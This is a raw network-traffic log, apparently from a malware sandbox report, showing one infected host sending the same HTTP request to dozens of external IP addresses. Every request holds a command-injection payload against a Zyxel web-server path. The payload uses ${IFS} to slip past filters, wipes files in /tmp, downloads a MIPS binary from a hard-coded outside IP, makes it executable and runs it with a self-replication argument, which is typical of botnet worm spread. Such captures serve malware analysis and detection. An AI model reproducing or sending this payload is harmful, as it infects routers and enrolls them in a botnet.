                                                Jan 28, 2024 10:16:25.817023993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4527192.168.2.235484645.118.83.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817058086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4528192.168.2.2358356210.65.227.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817089081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4529192.168.2.2338414138.5.156.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817123890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4530192.168.2.2341314117.251.208.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817152023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4531192.168.2.235175092.139.107.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817179918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4532192.168.2.233399244.77.44.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817209959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4533192.168.2.234325495.150.37.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817236900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4534192.168.2.233496631.188.110.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817264080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4535192.168.2.2351892133.80.213.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817290068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4536192.168.2.2358100100.252.196.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817301035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4537192.168.2.2340272221.115.43.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817343950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4538192.168.2.233470091.194.188.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817374945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4539192.168.2.233742241.175.127.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817409039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4540192.168.2.2357196107.113.28.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817446947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4541192.168.2.2360098193.236.202.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817472935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4542192.168.2.234471824.198.254.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817496061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4543192.168.2.235796281.6.44.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817518950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4544192.168.2.234011477.74.246.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817553043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4545192.168.2.2357534140.167.196.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817579985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4546192.168.2.2348344145.43.39.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817590952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4547192.168.2.2358866180.185.32.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817641973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4548192.168.2.233967689.124.23.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817678928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4549192.168.2.233862837.28.175.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817709923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4550192.168.2.2334906157.232.152.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817728996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4551192.168.2.235243852.126.164.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817753077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4552192.168.2.2344788161.85.152.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817792892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4553192.168.2.2349410120.243.162.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817826033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4554192.168.2.2344004212.240.126.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817852020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4555192.168.2.235752827.175.221.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817872047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4556192.168.2.2336200190.110.236.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817898035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4557192.168.2.2349896172.52.236.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817920923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4558192.168.2.23417689.85.120.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817960978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4559192.168.2.236037820.245.159.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818005085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4560192.168.2.234481271.197.89.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818027020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4561192.168.2.2341740208.147.116.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818053961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4562192.168.2.2337098171.187.161.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818092108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4563192.168.2.2340296192.115.170.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818114042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4564192.168.2.2350724112.211.213.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818133116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4565192.168.2.2340514160.55.118.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818162918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4566192.168.2.235209039.48.227.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818197966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4567192.168.2.2342422169.128.101.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818240881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4568192.168.2.233824484.76.99.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818240881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4569192.168.2.2336110192.139.175.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818280935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4570192.168.2.2347548210.36.133.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818286896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4571192.168.2.2339108192.233.193.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818319082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4572192.168.2.23460581.246.133.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818355083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4573192.168.2.2341090145.54.172.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818391085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4574192.168.2.2342942200.68.192.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818418980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4575192.168.2.2358270170.62.202.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818435907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4576192.168.2.2334524176.172.91.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818459988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4577192.168.2.236039245.68.206.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818504095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4578192.168.2.235468467.108.171.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818535089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4579192.168.2.235802681.191.14.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818564892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4580192.168.2.2342174152.157.237.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818579912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4581192.168.2.2342382130.188.152.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818624973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4582192.168.2.236047838.235.249.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818667889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4583192.168.2.2333158154.127.124.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818682909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4584192.168.2.2358972121.226.38.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818730116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4585192.168.2.2337058173.99.44.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818734884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4586192.168.2.235913250.178.11.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818739891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4587192.168.2.235019425.139.67.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818769932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4588192.168.2.235393660.147.54.236443
                                                TimestampBytes transferredDirectionData
